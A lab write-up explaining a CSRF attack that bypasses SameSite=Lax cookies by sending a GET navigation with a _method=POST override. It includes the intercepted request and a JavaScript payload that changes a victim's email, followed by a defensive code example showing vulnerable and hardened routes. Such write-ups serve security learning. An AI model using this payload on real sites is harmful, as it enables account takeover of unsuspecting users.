SameSite Lax bypass via method override

Description

This lab's change email function is vulnerable to CSRF. To solve the lab, perform a CSRF attack that changes the victim's email address. You should use the provided exploit server to host your attack.

You can log in to your own account using the following credentials: wiener:peter

Approach

After logging in as the "wiener" user, I intercepted the change email request and sent it to Burp Repeater for further analysis:

POST /my-account/change-email HTTP/2
Host: 0a1e00ca04788ab88023d0e2003b0031.web-security-academy.net
Cookie: session=hm1jQnnLanBBd7Y2ES5hrmAGWCIQqLo0
...

email=qwe%40qwe.qwe

I tried changing the method to GET, but the endpoint only accepts POST requests:

HTTP/2 405 Method Not Allowed
Allow: POST
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 20

"Method Not Allowed"

My goal was to change the victim's email address through a CSRF attack. However, because the session cookie is set with SameSite=Lax, the browser will not attach it to a cross-site POST request, which blocks the straightforward CSRF attack. SameSite=Lax does still send the cookie on top-level GET navigations, so to bypass it I needed to send the change email request as a GET and override the request method.

To achieve this, I used the _method parameter to override the method, so that the server treats the GET request as the POST it expects. Here's the payload I crafted:

<script>
location="https://0a1e00ca04788ab88023d0e2003b0031.web-security-academy.net/my-account/change-email?email=ichyaboyhacker%40hacked.com&_method=POST";
</script>

This payload bypasses the SameSite=Lax protection by sending a top-level GET navigation (which carries the session cookie) while overriding the method to POST through the _method parameter. After clicking Store and then Deliver exploit to victim, I confirmed that the lab was solved, indicating that the victim's email address had been changed.
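To show why the _method override defeats SameSite=Lax on the server side, and what the fix looks like, here is an added example that is not code from the lab or from this write-up. It models a change-email route in plain Node.js with no framework: the vulnerable version reads _method from the query string of any request, so a top-level GET navigation (which Lax still sends the cookie on) is promoted to a POST; the hardened version only honours _method from a POST body and requires a session-bound CSRF token. The request objects, the laxCookieAttached model of the browser's cookie rule, the session shape and all handler names are constructed assumptions for this example.

```javascript
// Added example (not from the lab or the write-up): a minimal model of a
// change-email route that honours a `_method` override, shown as the
// vulnerable pattern and a hardened one. Request objects, the session shape
// and the handler names are constructed for this example.

// Minimal query-string parser (no framework assumed).
function parseQuery(url) {
  const query = url.split("?")[1] || "";
  const params = {};
  for (const pair of query.split("&")) {
    if (!pair) continue;
    const [key, value = ""] = pair.split("=");
    params[decodeURIComponent(key)] = decodeURIComponent(value.replace(/\+/g, " "));
  }
  return params;
}

// Models the SameSite=Lax rule the write-up relies on: the session cookie is
// attached to same-site requests and to cross-site top-level GET navigations,
// but not to cross-site POST submissions.
function laxCookieAttached(req) {
  return req.sameSite || (req.method === "GET" && req.topLevelNavigation);
}

// Vulnerable pattern: `_method` is read from the query string as well as the
// body, so a plain GET navigation can be promoted to a POST.
function vulnerableChangeEmail(req, state) {
  if (!laxCookieAttached(req)) return { status: 401 };
  const params = { ...parseQuery(req.url), ...(req.body || {}) };
  const effective = String(params._method || req.method).toUpperCase();
  if (effective !== "POST") return { status: 405 };
  if (!params.email) return { status: 400 };
  state.email = params.email;
  return { status: 302 };
}

// Hardened pattern:
//  1. only honour `_method` from a POST body (the form-emulation use case),
//     never from a GET or from the query string;
//  2. require the CSRF token bound to the session on every state change.
function hardenedChangeEmail(req, state) {
  if (!laxCookieAttached(req)) return { status: 401 };
  if (req.method !== "POST") return { status: 405 };
  const params = req.body || {};
  const effective = String(params._method || "POST").toUpperCase();
  if (effective !== "POST") return { status: 405 };
  if (!params.csrf || params.csrf !== req.session.csrf) return { status: 403 };
  if (!params.email) return { status: 400 };
  state.email = params.email;
  return { status: 302 };
}

// Constructed cross-site top-level GET modelled on the write-up's payload.
const crossSiteGet = {
  method: "GET",
  url: "/my-account/change-email?email=attacker%40example.com&_method=POST",
  sameSite: false,
  topLevelNavigation: true,
  body: null,
  session: { csrf: "example-token" },
};

// Constructed legitimate same-site form submission carrying the CSRF token.
const legitimatePost = {
  method: "POST",
  url: "/my-account/change-email",
  sameSite: true,
  topLevelNavigation: true,
  body: { email: "new@example.com", csrf: "example-token" },
  session: { csrf: "example-token" },
};

// Runs one request through a handler on a fresh account and reports the outcome.
function runScenario(handler, req) {
  const state = { email: "wiener@example.com" };
  const response = handler(req, state);
  return { status: response.status, email: state.email };
}

console.log("vulnerable, cross-site GET:", runScenario(vulnerableChangeEmail, crossSiteGet));
console.log("hardened, cross-site GET:", runScenario(hardenedChangeEmail, crossSiteGet));
console.log("hardened, legitimate POST:", runScenario(hardenedChangeEmail, legitimatePost));
```

Run with `node` and the first line shows the account email replaced by the cross-site GET (status 302), the second shows the hardened route refusing it with 405 and leaving the email untouched, and the third shows a genuine same-site form submission still succeeding. The design point is that a method override exists to let HTML forms emulate PUT or DELETE, so it should only ever be read from a POST body; a separate CSRF token covers the case where SameSite is relaxed or unsupported.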